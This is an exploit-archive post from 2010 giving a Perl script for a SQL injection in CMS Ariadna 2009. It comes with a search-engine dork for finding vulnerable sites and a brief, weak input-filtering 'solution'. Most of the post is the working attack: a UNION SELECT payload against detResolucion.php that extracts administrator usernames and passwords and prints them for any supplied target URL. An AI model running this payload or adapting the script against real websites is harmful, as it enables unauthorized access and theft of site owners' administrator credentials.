CMS Ariadna 2009 SQL Injection Vulnerability

Posted on 19 April 2010
============================================
CMS Ariadna 2009 SQL Injection Vulnerability
============================================

# Exploit Title : CMS Ariadna 2009 SQL Injection
# Date : 2010-04-19
# Author : Andr?s G?mez
# Contact : gomezandres@adinet.com.uy
# Dork : "allinurl: detResolucion.php?tipodoc_id="
########################################################################
Exploit in Perl Start In Next Line:
 
use LWP::Simple;
 
########################################################################
# Malicious users may inject SQL querys into a vulnerable
# application to fool a user in order to gather data from them or see
sensible information.
########################################################################
# Solution:
# $_GET = preg_replace("|([^ws'])|i",'',$_GET);
# $_POST = preg_replace("|([^ws'])|i",'',$_POST);
########################################################################
# Special Thanks : HYPERNETHOST & Security-Pentest & Mauro Rossi
##########################[Andr?s G?mez]#################################
 
my $target = $ARGV[0];
unless ($target) { print "
 Inyector Remoto -- HYPERNETHOST &
Security-Pentest -- Andres Gomez

";
print " Dork: allinurl: detResolucion.php?tipodoc_id=
";
print "
Ejemplo Ejecucion = AriadnaCms.pl
http://www.sitio.extension/path/
" ; exit 1; }
 
$sql =
"detResolucion.php?tipodoc_id=33+and+1=0+union+select+concat(0x7365637572697479,adm_nombre,0x3a,0x70656e74657374,adm_clave)+from+administrador--";
 
$final = $target.$sql;
$contenido = get($final);
 
print "

[+] Pagina Web: $target

";
if ($contenido =~/security(.*):pentest(.*)/) {
print "[-] Datos extraidos con exito:

";
print "[+] Usuario = $1
";
print "[+] Password = $2
";
} else {
print "[-] No se obtuvieron datos

";
exit 1;
}
 
print "
[?] Escriba exit para salir de la aplicacion
";
 
exit 1;


# Inj3ct0r.com [2010-04-19]
TOP
Malware :

Last 20
Exploits :

Last 20